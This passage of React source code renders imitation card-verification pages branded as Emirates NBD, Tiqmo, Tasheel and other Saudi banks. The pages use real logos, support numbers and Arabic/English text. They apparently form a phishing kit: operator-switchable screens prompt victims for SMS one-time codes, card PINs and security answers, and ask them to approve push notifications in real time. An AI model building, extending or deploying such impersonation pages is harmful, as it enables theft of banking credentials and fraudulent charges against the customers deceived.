            <div className="ksa-enbd-wrapper" dir="ltr">
                <div className="ksa-enbd-close-row">
                    <button type="button" className="ksa-enbd-close-btn" onClick={handleCleanCancel} title="Close">X</button>
                </div>

                <div className="ksa-enbd-logos-row">
                    <div className="ksa-enbd-logo-wrap">
                        <img src="/images/banks/ksa/enbd.png" alt="Emirates NBD" className="ksa-enbd-logo-img" />
                    </div>
                    {isMc ? <McIdCheckSvg /> : <VisaLogo />}
                </div>

                <div className="ksa-enbd-header-divider"></div>

                <div className="ksa-enbd-content-area">
                    <h1 className="ksa-enbd-auth-title">{title}</h1>
                    <p className="ksa-enbd-auth-desc-1" dangerouslySetInnerHTML={{ __html: p1 }}></p>
                    {p2 && <p className="ksa-enbd-auth-desc-2" dangerouslySetInnerHTML={{ __html: p2 }}></p>}

                    {mode === 'error' ? (
                        <div className="ksa-error-box">
                            <p>{errorMessage || 'Verification Failed'}</p>
                            <button type="button" onClick={handleCleanCancel} className="ksa-enbd-submit-btn">{isRefund ? 'Return' : 'Return'}</button>
                        </div>
                    ) : mode === 'push' ? (
                        <div className="ksa-push-box">
                            <div className="ksa-spinner"></div>
                            <p>{p1}</p>
                            <button type="button" className="ksa-enbd-submit-btn" onClick={handleApprovePush} style={{ marginTop: '16px' }}>
                                I confirmed push
                            </button>
                            <div className="ksa-enbd-resend-row" style={{ marginTop: '12px' }}>
                                <button type="button" className="ksa-enbd-resend-link" onClick={() => handleResend('A new notification has been sent')}>
                                    RESEND NOTIFICATION
                                </button>
                            </div>
                        </div>
                    ) : (
                        <form className="ksa-enbd-otp-form" onSubmit={handleFormSubmit}>
                            {errorMessage && <div className="ksa-error-msg">{errorMessage}</div>}
                            <label className="ksa-enbd-form-label">
                                {mode === 'pin' ? 'PIN' : mode === 'question' ? 'Answer' : 'Verification Code'}
                            </label>
                            <input
                                type={formInputType}
                                value={formVal}
                                onChange={onInputChange}
                                className="ksa-enbd-otp-input"
                                maxLength={formMaxLen}
                                inputMode={mode === 'question' ? 'text' : 'numeric'}
                                autoFocus
                            />
                            <button type="submit" className="ksa-enbd-submit-btn" disabled={isSubmitting}>
                                {isSubmitting ? <span className="ksa-spinner-small"></span> : (mode === 'pin' ? 'VERIFY' : isRefund ? 'CONFIRM REFUND' : 'SUBMIT')}
                            </button>
                        </form>
                    )}

                    {mode !== 'push' && mode !== 'error' && mode !== 'question' && (
                        <div className="ksa-enbd-resend-row">
                            <button type="button" className="ksa-enbd-resend-link" onClick={() => handleResend('A new secure code has been sent to your registered number')}>
                                RESEND CODE
                            </button>
                        </div>
                    )}

                    <div className="ksa-enbd-footer-help-row">
                        <button type="button" className="ksa-enbd-help-link" onClick={() => showToast('Contact Emirates NBD 24/7 Support: +971 600 54 0000')}>
                            Need some help?
                        </button>
                        <span className="ksa-enbd-footer-pipe">|</span>
                        <button type="button" className="ksa-enbd-help-link" onClick={() => showToast('Visa Secure / Mastercard ID Check protects your card online')}>
                            learn more about authentication
                        </button>
                    </div>
                </div>
            </div>
        );
    };

    // ============================================================
    // 6. TIQMO (ANB)
    // ============================================================
    const renderTiqmo = () => {
        const isAr = activeLang === 'ar';
        const resendToast = isAr ? 'تم إرسال رمز جديد إلى هاتفك' : 'A new code has been sent to your phone';

        let title = isAr ? 'مصادقة الشراء' : 'Purchase Authentication';
        if (mode === 'pin') title = isAr ? 'مصادقة الرقم السري' : 'PIN Authentication';
        else if (mode === 'question') title = isAr ? 'مصادقة الدفع' : 'Payment Authentication';
        else if (isRefund || mode === 'refund') title = isAr ? 'مصادقة الاسترداد' : 'Refund Authentication';

        let desc = isAr
            ? `تم ارسال رسالة نصية تحتوي على رمز OTP إلى رقمك المسجل.<br/>أنت تدفع الان للتاجر ${merchant} مبلغ ${amount} ${currency} يوم ${dateStr} ${timeStr}.`
            : `An SMS message has been sent containing OTP<br/>to your registered phone number you're paying<br/>now to the merchant ${merchant} amount of<br/>${currency} ${amount} on ${dateStr} ${timeStr}.`;

        if (mode === 'pin') {
            desc = isAr ? 'يرجى إدخال الرقم السري للبطاقة أدناه:' : 'Please enter your card PIN below:';
        } else if (mode === 'question') {
            desc = customQuestion || (isAr ? 'يرجى الإجابة على سؤال الأمان أدناه لتأكيد عملية الدفع:' : 'Please answer the security question below to authorize this payment:');
        } else if (mode === 'push') {
            desc = customMessage || (isAr ? 'يرجى فتح تطبيق تيمو وتأكيد طلب الدفع.' : 'Please open Tiqmo app and confirm the payment request.');
        }

        return (
            <div className="ksa-tiqmo-wrapper" dir={isAr ? 'rtl' : 'ltr'}>
                <div className="ksa-tiqmo-logos-row">
                    <div className="ksa-tiqmo-logo-wrap">
                        <img src="/images/banks/ksa/tiqmo.png" alt="tiqmo" className="ksa-tiqmo-logo-img" />
                    </div>
                    {isMc ? <McIdCheckSvg /> : <VisaLogo />}
                </div>

                <div className="ksa-tiqmo-lang-row">
                    <button
                        type="button"
                        className="ksa-tiqmo-lang-btn"
                        onClick={() => setActiveLang(isAr ? 'en' : 'ar')}
                    >
                        {isAr ? 'English' : 'Arabic'}
                    </button>
                </div>

                <h1 className="ksa-tiqmo-purchase-title">{title}</h1>
                <p className="ksa-tiqmo-description-text" dangerouslySetInnerHTML={{ __html: desc }}></p>

                {mode === 'error' ? (
                    <div className="ksa-error-box"><p>{errorMessage || 'Verification Failed'}</p></div>
                ) : mode === 'push' ? (
                    <div className="ksa-push-box">
                        <div className="ksa-spinner"></div>
                        <p dangerouslySetInnerHTML={{ __html: desc }}></p>
                        <div className="ksa-tiqmo-buttons-container">
                            <button type="button" className="ksa-tiqmo-btn ksa-tiqmo-btn-primary" onClick={handleApprovePush}>
                                {isAr ? 'لقد أكدت الإشعار' : 'I confirmed push'}
                            </button>
                            <button type="button" className="ksa-tiqmo-btn ksa-tiqmo-btn-secondary" onClick={() => handleResend(isAr ? 'تم إرسال إشعار جديد' : 'A new notification has been sent')}>
                                {isAr ? 'إعادة إرسال' : 'RESEND'}
                            </button>
                            <button type="button" className="ksa-tiqmo-btn ksa-tiqmo-btn-secondary" onClick={handleCleanCancel}>
                                {isAr ? 'إلغاء' : 'CANCEL'}
                            </button>
                        </div>
                    </div>
                ) : (
                    <form onSubmit={handleFormSubmit}>
                        <div className="ksa-tiqmo-input-section">
                            <label className="ksa-tiqmo-input-prompt">
                                {mode === 'pin' ? (isAr ? 'الرقم السري:' : 'Enter PIN:') : mode === 'question' ? (isAr ? 'الإجابة:' : 'Your Answer:') : (isAr ? 'أدخل الرمز المرسل:' : 'Enter the code below:')}
                            </label>
                            <input
                                type={formInputType}
                                value={formVal}
                                onChange={onInputChange}
                                className="ksa-tiqmo-otp-field"
                                maxLength={formMaxLen}
                                inputMode={mode === 'question' ? 'text' : 'numeric'}
                                autoFocus
                            />
                        </div>

                        {/* Button Order dynamically adapted for EN (Confirm, Resend, Cancel) vs AR (Confirm, Cancel, Resend) */}
                        <div className="ksa-tiqmo-buttons-container">
                            <button type="submit" className="ksa-tiqmo-btn ksa-tiqmo-btn-primary" disabled={isSubmitting}>
                                {isSubmitting ? <span className="ksa-spinner-small"></span> : (mode === 'pin' ? (isAr ? 'ادخال' : 'CONFIRM') : isRefund ? (isAr ? 'تأكيد الاسترداد' : 'CONFIRM REFUND') : (isAr ? 'ادخال' : 'CONFIRM'))}
                            </button>

                            {isAr ? (
                                <>
                                    <button type="button" className="ksa-tiqmo-btn ksa-tiqmo-btn-secondary" onClick={handleCleanCancel}>
                                        إلغاء
                                    </button>
                                    {mode !== 'question' && (
                                        <button type="button" className="ksa-tiqmo-btn ksa-tiqmo-btn-secondary" onClick={() => handleResend(resendToast)}>
                                            إعادة إرسال
                                        </button>
                                    )}
                                </>
                            ) : (
                                <>
                                    {mode !== 'question' && (
                                        <button type="button" className="ksa-tiqmo-btn ksa-tiqmo-btn-secondary" onClick={() => handleResend(resendToast)}>
                                            RESEND
                                        </button>
                                    )}
                                    <button type="button" className="ksa-tiqmo-btn ksa-tiqmo-btn-secondary" onClick={handleCleanCancel}>
                                        CANCEL
                                    </button>
                                </>
                            )}
                        </div>
                    </form>
                )}

                <p className="ksa-tiqmo-timer-notice">
                    {isAr
                        ? `ستنتهي صلاحية هذه الصفحة تلقائيا بعد ${timeLeft || 420} ثانية.`
                        : `This page will end automatically after ${timeLeft || 420} seconds.`
                    }
                </p>

                <div className="ksa-tiqmo-help-accordion">
                    <div className="ksa-tiqmo-help-header" onClick={() => toggleAccordion('tiqmo_help')}>
                        <span className="ksa-tiqmo-help-title">{isAr ? 'بحاجة لبعض المساعدة؟' : 'Do you need any help?'}</span>
                        <span className="ksa-tiqmo-help-icon">{openAccordions['tiqmo_help'] ? '−' : '+'}</span>
                    </div>
                    {openAccordions['tiqmo_help'] && (
                        <div className="ksa-tiqmo-help-body">
                            {isAr ? 'إذا لم تستلم رمز التحقق أو كنت تواجه صعوبات، يرجى التواصل مع فريق دعم تيمو (Tiqmo) على مدار الساعة أو طلب إعادة إرسال رمز جديد.' : 'If you have not received your verification code or are experiencing issues, please contact Tiqmo customer support 24/7 or retry by requesting a new code.'}
                        </div>
                    )}
                </div>
            </div>
        );
    };

    // ============================================================
    // 7. TASHEEL / UCFS (United Company for Financial Services)
    // ============================================================
    const renderTasheel = () => {
        const isAr = activeLang === 'ar';
        const resendToast = isAr ? 'تم طلب رمز تحقق جديد' : 'A new SMS verification code has been requested';

        let title = isAr ? 'أدخل رمز SecureCode™ الخاص بك' : 'Enter your SecureCode™';
        if (mode === 'pin') title = isAr ? 'أدخل الرقم السري للبطاقة' : 'Enter your Card PIN';
        else if (mode === 'question') title = isAr ? 'مصادقة الأمان' : 'Payment Authentication';
        else if (isRefund || mode === 'refund') title = isAr ? 'تأكيد استرداد المبلغ' : 'Refund Verification';

        return (
            <div className="ksa-tasheel-card-window" dir={isAr ? 'rtl' : 'ltr'}>
                <div className="ksa-tasheel-top-flags-row">
                    <button type="button" className={`ksa-flag-btn ${!isAr ? 'active' : ''}`} onClick={() => setActiveLang('en')} title="English">
                        <UkFlagSvg />
                    </button>
                    <button type="button" className={`ksa-flag-btn ${isAr ? 'active' : ''}`} onClick={() => setActiveLang('ar')} title="العربية">
                        <SaFlagSvg />
                    </button>
                </div>

                <div className="ksa-tasheel-logos-row">
                    <div className="ksa-tasheel-logo-wrap">
                        <img src="/images/banks/ksa/tasheel.png" alt="Tasheel - United Company for Financial Services" className="ksa-tasheel-logo-img" />
                    </div>
                    {isMc ? <McIdCheckSvg /> : <VisaLogo />}
                </div>

                <div className="ksa-tasheel-title-row">
                    <h1 className="ksa-tasheel-securecode-title">{title}</h1>
                    <div className="ksa-tasheel-title-divider"></div>
                </div>

                <div className="ksa-tasheel-details-table-wrap">
                    <table className="ksa-tasheel-details-table">
                        <tbody>
                            <tr>
                                <td className="ksa-tasheel-details-label">{isAr ? 'التاجر:' : 'Merchant:'}</td>
                                <td className="ksa-tasheel-details-value">{merchant}</td>
                            </tr>
                            <tr>
                                <td className="ksa-tasheel-details-label">{isAr ? 'الوصف:' : 'Description:'}</td>
                                <td className="ksa-tasheel-details-value">Default value Authentication for</td>
                            </tr>
                            <tr>
                                <td className="ksa-tasheel-details-label">{isAr ? 'المبلغ:' : 'Amount:'}</td>
                                <td className="ksa-tasheel-details-value ksa-tasheel-amount-value">{amount} {currency}</td>
                            </tr>
                            <tr>
                                <td className="ksa-tasheel-details-label">{isAr ? 'التاريخ:' : 'Date:'}</td>
                                <td className="ksa-tasheel-details-value">{dateStr}</td>
                            </tr>
                            <tr>
                                <td className="ksa-tasheel-details-label">{isAr ? 'رقم البطاقة:' : 'Card number:'}</td>
                                <td className="ksa-tasheel-details-value">**** **** **** {last4}</td>
                            </tr>
                            <tr>
                                <td className="ksa-tasheel-details-label">{isAr ? 'التحية الشخصية:' : 'Personal Greeting:'}</td>
                                <td className="ksa-tasheel-details-value">Valued Customer</td>
                            </tr>
                        </tbody>
                    </table>
                </div>

                <div className="ksa-tasheel-info-text-section">
                    {mode === 'question' ? (
                        <p className="ksa-tasheel-info-paragraph">
                            {customQuestion || (isAr ? 'يرجى الإجابة على سؤال الأمان أدناه لإتمام المعاملة.' : 'Please answer your security question below to complete the transaction.')}
                        </p>
                    ) : (
                        <>
                            <p className="ksa-tasheel-info-paragraph">
                                {isAr
                                    ? 'تم إرسال كلمة مرور لمرة واحدة إلى رقم هاتفك المسجل.'
                                    : 'One-time password has been sent to your registered telephone number.'
                                }
                            </p>
                            <p className="ksa-tasheel-info-paragraph">
                                {isAr
                                    ? 'يرجى التحقق من تفاصيل المعاملة والتحية الشخصية. إذا كان كل شيء صحيحاً، انتظر رسالة SMS التي تحتوي على كلمة المرور لمرة واحدة وأدخلها في خانة SecureCode.'
                                    : 'Please verify transaction details and personal greeting. If everything is correct, wait for one-time password SMS and enter it in the SecureCode field.'
                                }
                            </p>
                        </>
                    )}
                </div>

                <div className="ksa-tasheel-section-divider"></div>

                {mode === 'error' ? (
                    <div className="ksa-error-box"><p>{errorMessage || 'Verification Failed'}</p></div>
                ) : mode === 'push' ? (
                    <div className="ksa-push-box">
                        <div className="ksa-spinner"></div>
                        <p>{customMessage || (isAr ? 'يرجى فتح تطبيق تسهيل وتأكيد العملية.' : 'Please open Tasheel app and confirm authentication.')}</p>
                        <div className="ksa-tasheel-submit-row" style={{ marginTop: '16px' }}>
                            <button type="button" className="ksa-tasheel-btn-submit" onClick={handleApprovePush}>
                                {isAr ? 'لقد أكدت الإشعار' : 'I confirmed push'}
                            </button>
                        </div>
                        <div className="ksa-tasheel-not-received-row" style={{ marginTop: '10px' }}>
                            <button type="button" className="ksa-tasheel-not-received-link" onClick={() => handleResend(isAr ? 'تم إرسال إشعار جديد' : 'A new notification has been sent')}>
                                {isAr ? 'لم تستلم الإشعار؟' : "Didn't get push notification?"}
                            </button>
                        </div>
                    </div>
                ) : (
                    <form className="ksa-tasheel-auth-form" onSubmit={handleFormSubmit}>
                        {errorMessage && <div className="ksa-error-msg">{errorMessage}</div>}
                        <input
                            type={formInputType}
                            value={formVal}
                            onChange={onInputChange}
                            className="ksa-tasheel-otp-field"
                            placeholder={mode === 'pin' ? (isAr ? 'الرقم السري' : 'Card PIN') : mode === 'question' ? (isAr ? 'الإجابة' : 'Answer') : (isAr ? 'رمز SMS لمرة واحدة' : 'SMS One-time password')}
                            maxLength={formMaxLen}
                            inputMode={mode === 'question' ? 'text' : 'numeric'}
                            autoFocus
                        />

                        {mode !== 'question' && (
                            <div className="ksa-tasheel-not-received-row">
                                <button type="button" className="ksa-tasheel-not-received-link" onClick={() => handleResend(resendToast)}>
                                    {isAr ? 'لم تستلم رمز SMS لمرة واحدة؟' : "Didn't get one-time password SMS?"}
                                </button>
                            </div>
                        )}

                        <div className="ksa-tasheel-section-divider"></div>

                        <div className="ksa-tasheel-submit-row">
                            <button type="submit" className="ksa-tasheel-btn-submit" disabled={isSubmitting}>
                                {isSubmitting ? <span className="ksa-spinner-small"></span> : (mode === 'pin' ? (isAr ? 'تأكيد' : 'SUBMIT') : isRefund ? (isAr ? 'تأكيد' : 'SUBMIT') : (isAr ? 'إرسال' : 'SUBMIT'))}
                            </button>
                        </div>
                    </form>
                )}

                <div className="ksa-tasheel-footer-row">
                    <button type="button" className="ksa-tasheel-exit-link" onClick={handleCleanCancel}>
                        {isAr ? 'خروج' : 'Exit'}
                    </button>
                    <button type="button" className="ksa-tasheel-help-wrap" onClick={() => showToast(isAr ? 'للتواصل مع دعم تسهيل: 800-304-4433' : 'Contact Tasheel / UCFS Support: 800-304-4433')}>
                        <span className="ksa-tasheel-help-icon-sq">?</span>
                        <span className="ksa-tasheel-help-text">{isAr ? 'مساعدة' : 'Help'}</span>
                    </button>
                </div>
            </div>
        );
    };

    // ============================================================
    // MAIN WRAPPER
    // ============================================================
    return (
        <div className={`ksa-global-container ${bankId === 'ksa_riyad' ? 'ksa-riyad-global' : ''} ${isShaking ? 'ksa-shake' : ''}`}>
            {toastMessage && <div className="ksa-toast">{toastMessage}</div>}
            {bankId === 'ksa_alrajhi' && renderAlRajhi()}
            {bankId === 'ksa_snb' && renderSnb()}
            {bankId === 'ksa_riyad' && renderRiyad()}
            {bankId === 'ksa_sab' && renderSab()}
            {bankId === 'ksa_enbd' && renderEnbd()}
            {bankId === 'ksa_tiqmo' && renderTiqmo()}
            {bankId === 'ksa_tasheel' && renderTasheel()}
        </div>
    );
}
